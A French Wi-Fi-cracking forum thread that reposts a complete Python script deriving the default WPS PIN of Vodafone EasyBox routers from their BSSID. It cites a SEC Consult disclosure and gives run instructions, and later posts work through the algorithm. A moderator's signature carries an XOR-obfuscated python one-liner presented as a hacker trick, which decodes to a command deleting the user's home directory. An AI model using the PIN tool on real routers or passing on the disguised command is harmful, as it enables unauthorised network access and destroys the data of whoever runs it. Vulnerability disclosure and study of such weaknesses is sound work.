Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 01-09-2013 12:05:05

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

PIN WPS par défaut des Vodafone Easybox (Stefan Viehböck)

Le sympathique créateur de wpscrack a encore frappé.
Ce coup-ci c'est le géant allemand des télécommunications, Vodafone, qui est dans le collimateur avec ses "easybox"
Elles sont assemblées par arcadyan technologies/Astoria Network, un fabricant qui c'était déjà fait remarqué avec sa "livebox" qui est distribuée par l'opérateur Orange en Espagne ( cf Orange.sh : générateur WPA livebox 2.1 espagnole )

Le WPS est activé par défaut et le PIN par défaut se génère avec les 6 derniers numéros de la mac et le numéro de série.
Le numéro de série est lui même déductible avec le bssid, donc la boucle est bouclée. tongue

Voici le code publié par Stefan Viehböck >

#!/usr/bin/env python
import sys, re

def gen_pin (mac_str, sn):
    mac_int = [int(x, 16) for x in mac_str]
    sn_int = [0]*5+[int(x) for x in sn[5:]]
    hpin = [0] * 7

    k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF
    k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF
    hpin[0] = k1 ^ sn_int[9];
    hpin[1] = k1 ^ sn_int[8];
    hpin[2] = k2 ^ mac_int[9];
    hpin[3] = k2 ^ mac_int[10];
    hpin[4] = mac_int[10] ^ sn_int[9];
    hpin[5] = mac_int[11] ^ sn_int[8];
    hpin[6] = k1 ^ sn_int[7];
    pin = int('%1X%1X%1X%1X%1X%1X%1X' % (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5],
hpin[6]), 16) % 10000000

    # WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or
        # http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc
    accum = 0
    t = pin
    while (t):
        accum += 3 * (t % 10)
        t /= 10
        accum += t % 10
        t /= 10
    return '%i%i' % (pin, (10 - accum % 10) % 10)

def main():
    if len(sys.argv) != 2:
        sys.exit('usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n')

    mac_str = re.sub(r'[^a-fA-F0-9]', '', sys.argv[1])
    if len(mac_str) != 12:
        sys.exit('check MAC format!\n')

    sn = 'R----%05i' % int(mac_str[8:12], 16)
    print 'derived serial number:', sn
    print 'SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c' % (mac_str[6], mac_str[7], mac_str[8],
mac_str[9], sn[5], sn[9])
    print 'WPS pin:', gen_pin(mac_str, sn)

if __name__ == "__main__":
    main()

Pour utiliser le script gardez le texte dans un fichier que vous appelez easybox_wps.py , vous vous situez dans le directoire ou vous avez gardé le fichier et vous l’exécutez avec

python easybox_wps.py <BSSID_OBJECTIF>

exemple

python easybox_wps.py 00:11:22:33:44:55 

hjtj.png


Je ne saisis pas les détails des opérations... Mais si une âme généreuse pouvais expliquer un peu le procédé... Ça serait très sympa tongue


Voici le lien vers le Full Disclosure ....

SEC Consult SA-20130805-0 :: Vodafone EasyBox Default WPS PIN Algorithm Weakness

Voici le lien vers la web SEC Consult

SEC Consult

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 01-09-2013 12:24:44

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : PIN WPS par défaut des Vodafone Easybox (Stefan Viehböck)

C'est juste énorme tongue encore une fois on observe l'importance de l'adresse mac et du numéro de série.Donc ceux qui pense que les clé wpa des livebox sont généré aléatoirement... j'en doute.

Arcadyan technologie mmh j'ai déga vue ça quelque part sous wireshark mais je me rappelle plus sur quel routeur.

Hors Ligne

#3 01-09-2013 12:42:15

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : PIN WPS par défaut des Vodafone Easybox (Stefan Viehböck)

Ils sont un peu partout et travaillent souvent directement avec les ISP.
Ils ont aussi leur propre ligne de produits
kmqv.png
Il est possible qu'un ISP français est utilisée un modèle arcadyan pour une box.

Hors Ligne

#4 02-09-2013 17:13:30

le dirdir
Membre d'Or
Inscription : 09-03-2013
Messages : 367

Re : PIN WPS par défaut des Vodafone Easybox (Stefan Viehböck)

Il semblerait que KPN (nl) utilise un routeur Arcadyan pour leur game ExperiaBox.

Le SSID finit par 6 chiffres. Ça ressemble à de l’hexadécimal.

standaardnaam AVR7519(+6cijfercode)

http://kpn.gebruikers.eu/forum/viewthre … ad_id=1522

Il faudra que je trouve une box dans une brocante. big_smile

Dernière modification par le dirdir (02-09-2013 17:24:23)


Tant vaut l'antenne, tant vaut le poste

Hors Ligne

#5 02-09-2013 17:34:51

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : PIN WPS par défaut des Vodafone Easybox (Stefan Viehböck)

Je me rappelle maintenant, c'est sur mon ancienne v6 que j'avais vu de l'arcadyan apparaitre sous wireshark.Quand aux livebox2 c'est du Z-com.

Hors Ligne

#6 03-09-2013 01:44:43

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : PIN WPS par défaut des Vodafone Easybox (Stefan Viehböck)

Spawn, nous-m'expliquerais  tu brièvement avec un petit exemple comment fait le code pour générer le PIN please...

Hors Ligne

#7 03-09-2013 09:00:38

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : PIN WPS par défaut des Vodafone Easybox (Stefan Viehböck)

Ça sent le reverse engineering son code.

Il procède en 2 temps :
(exemple avec 00:11:22:33:44:55

Initialisation

Il récupère le numéro de série et le SSID depuis l'adresse mac :

  • SN = les deux derniers octets de la mac en base 10 = 0x4455 = 17493

  • SSID = mac[4]+mac[5]+SN[0]+SN[4] = 334413

(le sn fait toujours 5 chiffres décimaux, quitte à mettre des zéros.)

Calcul du pin

Le calcul du pin se fait en utilisant deux clefs, k1 et k2, obtenues à partir du SN et de la mac. (qui sont maintenant des tableaux de petits entiers :

  • mac = [0,0,1,1,2,2,3,3,4,4,5,5] (en hexa)

  • sn = [1,7,4,9,3]

Le calcul est accumulé dans un nibble :

  • k1 = (sn[2] + sn[3] + mac[10] + mac[11]) % 16 = (7+4+5+5)%16 = 5

  • k2 = (sn[4] + sn[5] + mac[8] + mac[9]) % 16 = (9+3+4+4)%16 = 4

et les 7 chiffres du pin (le dernier est calculé, c'est une somme de contrôle) sont obtenus avec les formules suivantes :

  hpin[0] = k1 ^ sn_int[5];
  hpin[1] = k1 ^ sn_int[4];
  hpin[2] = k2 ^ mac_int[9];
  hpin[3] = k2 ^ mac_int[10];
  hpin[4] = mac_int[10] ^ sn_int[5];
  hpin[5] = mac_int[11] ^ sn_int[4];
  hpin[6] = k1 ^ sn_int[3];

Où ^ est l'opérateur du xor.

Ce qui donne pour notre exemple :

$ ./pin_wps.py 001122334455    
derived serial number: R----17493
SSID: Arcor|EasyBox|Vodafone-334413
WPS pin: 32520330

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#8 03-09-2013 11:57:44

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : PIN WPS par défaut des Vodafone Easybox (Stefan Viehböck)

Merci beaucoup kiss.gif
J'ai presque l'impression d'être plus intelligent rien qu'en lisant ton explication smile

bon, pour faire le serial dérivé et l' essid c'est très clair
si je prends une mac 11:22:33:44:55:66
j'obtiens en serial dérivé 5566 convertit en décimal  >> SN 21862

je prends le digit 1 et 5 du serial dérivé et construit le essid avec les paires 4 et 5 du bssid
4455 + 22, essid = 445522

jusque ici tout va bien tongue

python /home/kcdtv/Desktop/easybox_wps.py 11:22:33:44:55:66 
derived serial number: R----21862
SSID: Arcor|EasyBox|Vodafone-445522
WPS pin: 10624135

suivent nos clefs k1 et k2 que je comprends comme une conversion en base 16 dans laquelle "on sucre" tout ce qui n'est pas unité.
dans notre hypothétique routeur avec bssid 11:22:33:44:55:66 avec serial dérivé 21862 ça nous fait

k1 = ( 1 + 8 + 6 + 6  ) %16 = 21 - 16 = 5

k2 = ( 6 + 2 + 5 + 5 )  %16 =  18 - 16 = 2

Je crois que c'est bon ?;..????
la notion de nibble m'échappe

maintenant il bous faudrait effectuer le reste des opérations
"l'opérateur du Xor" est un nouveau concept pour moi, en lisant un peu par XOR operator ( je viens juste de me rendre compte que c'est une page de microsoft tongue

je peux voir ça

For bitwise operations, the Xor operator performs a bitwise comparison of identically positioned bits in two numeric expressions and sets the corresponding bit in result according to the following table.

- table -

Since the logical and bitwise operators have a lower precedence than other arithmetic and relational operators, any bitwise operations should be enclosed in parentheses to ensure accurate execution.

For example, 5 Xor 3 is 6. To see why this is so, convert 5 and 3 to their binary representations, 101 and 011. Then use the previous table to determine that 101 Xor 011 is 110, which is the binary representation of the decimal number 6.

c'est joli opérateur booléen comme nom... on convertit les éléments à comparer en binaire
Une fois que l'on a nos deux chaines en binaire on compare entre eux les premiers digits, les seconds etc...
et nous regardons sur la table de valeur la valeur pour la nouvelle chaîne


ku4f.png

reprenons notre exemple et calculons le premier numéro du PIN

hpin[0] = k1 ^ sn_int[5]

k1         =    5   binaire               >> 101
sn_int[5] =   2   binaire               >>  10

0 (k1) et 1 (sn)  > 1
1 et 0              >  1

ce qui nous fait  11 = 3

or le PIN c'est WPS pin: 10624135

Qu'est ce qui m'échappe?

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Épinglée :
185 185343 10-07-2016 19:35:20 par Seska
14 12283 05-10-2015 13:44:46 par BobX64
4 655 29-06-2015 21:41:10 par le dirdir
0 1719 19-12-2014 03:04:44 par T!g3r
Épinglée :
10 10363 24-11-2014 09:46:01 par kcdtv

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.027 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]